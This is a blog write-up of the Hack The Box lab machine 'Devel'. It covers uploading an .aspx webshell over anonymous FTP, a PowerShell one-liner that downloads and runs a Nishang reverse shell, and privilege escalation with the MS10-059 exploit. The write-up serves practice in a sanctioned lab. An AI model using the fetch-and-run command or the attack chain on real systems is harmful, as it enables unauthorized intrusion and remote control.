HTB – Devel

In this machine from HTB, we get exposed to a few different elements around webhosting and ftp. We wil; eventually notice that the FTP directory (which we can log in anonymously too) is also the webroot. We upload a shell and continue our enumeration on the machine searching for a way to escalate our privileges.


Our initial nmap scan posted below, UDP/All ports returned nothing different:

After I verify that I can log in anonmously to FTP, there’s not much else to do there. So I proceed to enumerate port 80.

Just a landing page. I ran goBuster on this but didn’t find anything of interest, just the fact that the files in the FTP directory were the same in the web directory. I can already see where this going. If I can place files in the FTP directory like a webshell, I could access it from the browser and have a connection back to the victim.

Kali comes installed with a set of webshells that I personally find awesome. So I won’t waste much time hunting for a good webshell just go to the ones in the kali folder. I will start with the .aspx one since we’re running IIS7 (note that IIS doesn’t mean .asp(x) but typically it’s seen this way).

Now I will travel to that file in the browser:

and now I can run commands!

Our next step here is to get a fully functional reverse shell back. And with the knowledge I having of being able to execute commands, I am sure I can find one through netcat or powershell (nishang) to get a nice, reliable one open.

I am going with the Invoke-Tcp script from Nishang. I follow the directions in the script to add the invoke function to the add and set up a python server to get it to my machine. Once it’s on the machine it will run and call back to my netcat listener.

powershell iex(new-object net.webclient).downloadstring('')

Reverse shell!

There doesn’t seem to be an user flag on the box, so we will continue with our enumeration and try to find a way to root (Administrator)

I run systeminfo on the machine and notice it is running an old outdated version of Windows, so it’s probably susceptible to many kernel exploits. There is a tool from Rasta Mouse called Watson that can check for potential vulns and exploits.

Many thanks to 0xdf for showcasing step by step how this is done.

First thing is to find what .NET version are installed on target. We can do that by:

query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

One of the vulnerabilities we find is MS10-059 which is Chimichurri. I placed the exe right in the FTP directory and let her rip.

Easy enough, both flags!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: